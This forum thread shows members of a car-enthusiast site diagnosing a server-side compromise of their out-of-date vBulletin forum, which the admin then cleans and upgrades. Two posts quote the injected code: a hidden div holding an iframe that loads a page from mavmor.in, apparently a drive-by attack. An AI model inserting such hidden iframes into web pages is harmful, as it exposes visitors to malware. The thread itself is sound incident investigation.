When I go to this site using Google Chrome as my browser it gives me this message. It just started doing this the past day or so. Is this happening to anyone else?

9684

Apologies for the duplicate thread. I just noticed somebody already made a thread about this:

http://dmctalk.org/showthread.php?3624-Hey-mods-google-says-there-is-a-problem-here...

Chrome
Firefox
IE

All google fine for me, no warning like that when I search for the site and click on it. I'm using a PC and an iPad.

I got a warning as well the last two days. My Anti Virus software said it blocked the attack in all cases.

FWIW, using IE and viewing the source, the following is in several pages here:

<div style='display:none'><iframe width='9' height='6' src='http://mavmor.in/loop.php' frameborder='0' scrolling='no'></iframe></div>

I suspect it's something on each of the computers themselves that's manipulating the search results and/or code on the forum, but I'd like to take a closer look. I've tried duplicating the issue with Safari and Firefox on my MacBook Pro, Safari on my iPad, and Internet Explorer on my Windows 7 work laptop and I cannot reproduce it. That being said, these are all known-clean machines.

Ron, if you can get me the URLs for where you're seeing that source or at least MORE of the source, I can investigate further.

Just tried all browsers as well and no issues.


Went to my office and logged in on 3 different computers with Chrome, FF, IE with no issues either.

Nevermind, found it. Fired up Vista in a VM and used IE to access the home page. Sure enough, I found the div.

The forum *may* be compromised. I'm still looking to see what's generating the code.

Okay, there's good news and bad news. The good news is, there's no client-side compromise that's causing the search results and code to be manipulated. So everyone's computer is safe, at least as far as THIS specific issue.

The bad news is, it's definitely a server-side compromise of some sort:


ccurzio@Defiant:~$ lynx -source http://dmctalk.org/forum.php | grep mavmor
<div style='display:none'><iframe width='9' height='6' src='http://mavmor.in/loop.php' frameborder='0' scrolling='no'></iframe></div>

Something on the server is inserting this particular snippet of code into the pages of the site, just above the footer. I thought it interesting when I got a warning from IE that "This site uses Java" (I got a warning because I don't have a Java Runtime installed in my VM) and I suspect this is some kind of drive-by attack.

Still investigating.

Seems other vBulletin owners have the issue as well:
https://www.vbulletin.com/forum/showthread.php/399467-4-0-8-suspicious-code-from-mavmor-in

Seems other vBulletin owners have the issue as well:
https://www.vbulletin.com/forum/showthread.php/399467-4-0-8-suspicious-code-from-mavmor-in

I saw that, but didn't post as I assumed you guys are members there.

as an aside, I like the fact that the actual vbulletin forum is running 4.1.12, while dmctalk is on 4.1.3 :)

It wasn't until I installed the latest release of Chrome that I got this warning.

I saw that, but didn't post as I assumed you guys are members there.

as an aside, I like the fact that the actual vbulletin forum is running 4.1.12, while dmctalk is on 4.1.3 :)

Yeah we're members. We are working towards a solution.

Okay, so I have more good news and more bad news.

The good news is, whatever malware was present on "http://mavmor.in/loop.php" seems to be gone. So anyone visiting dmctalk.org should be safe for the time being since the only thing at that address right now is a blank page. (I even tried hitting it with a referer forged as dmctalk and it still returned a blank page.)

Bad news? It seems the forum is still vulnerable. I don't have access to the server itself so I can't investigate its code, but the installed version of vbulletin does have known injection vulnerabilities and is pretty far out of date.

Not sure how many folks here are running the Ubuntu or Mint flavours of Linux, but if you have Domain Blocker installed, you can simply block mavmor.in and use the forum as usual. You could also edit (gedit) /etc/hosts and assign mavmor.in to 127.0.0.1.

Not sure how many folks here are running the Ubuntu or Mint flavours of Linux, but if you have Domain Blocker installed, you can simply block mavmor.in and use the forum as usual.

Not really necessary, since mavmor.in has been emptied out.


You could also edit (gedit) /etc/hosts and assign mavmor.in to 127.0.0.1.

This has never been a great idea, either. The hosts file is a network management file meant for static mapping of hosts to IPs, and was never meant as a mechanism for blocking malicious sites. Beyond that, doing so only works if you process files before DNS in nsswitch.conf, and not all systems are configured that way. So in reality it might not be doing anything whatsoever.

It's just not a good idea to do this. That's not what the hosts file is for, really.

It's just not a good idea to do this. That's not what the hosts file is for, really.

As a temporary measure I think it would be fine.

.....As if 99% of the users here understood the last 4 posts. . . .:hmm:

.....As if 99% of the users here understood the last 4 posts. . . .:hmm:

LOL, I'm pretty sure if you tighten it where it goes into the Lambda counter you're good to go! ;)

If you carb your DeLorean the forum will be fixed. http://i.imgur.com/kviRP.gif

.....As if 99% of the users here understood the last 4 posts. . . .:hmm:

That's OK Dave, as far as I understand it the internet is just a series of tubes...

http://www.thedailyshow.com/watch/wed-july-12-2006/headlines---internet?xrs=share_copy

Granted it might be because the site has been taken down, but IE, Firefox, and Safari in XP all brought up the site with no problems. OS X was fine too over the past few days, so it wasn't related to the recent Mac Java exploit (no pop-up window asking for an Admin password for Terminal code being executed in the background).

Did anyone get a warning as to what the specific malware was?

Not sure how many folks here are running the Ubuntu or Mint flavours of Linux, but if you have Domain Blocker installed, you can simply block mavmor.in and use the forum as usual. You could also edit (gedit) /etc/hosts and assign mavmor.in to 127.0.0.1.

I'm a Lubuntu guy myself, ever since they started using the Unity DE in Ubuntu. Seems like the threat is pretty minimal though, if it's just bringing up a blank page.

After talking to vbulletin tech support, I've removed the bad script, so all should be good now. And an upgrade will probably take place tonight, so forum may be down for a short time period later tonight.

Tamir

Thanks, Tamir!

Forum back up. Apologies for the longer than stated delay. Server issues hampered my backup, and after fixing the malware issue, I wanted to ensure a clean backup to avoid any other issues that may arise with updating software later, etc.

All should be good for now, thank you for your patience.

Tamir

.....As if 99% of the users here understood the last 4 posts. . . .:hmm:

I've been making money servicing 8-Track players. Of course I have NO IDEA what any of that means. Though, if the repair shop is right, I need a new computer troll in order to get to the internet.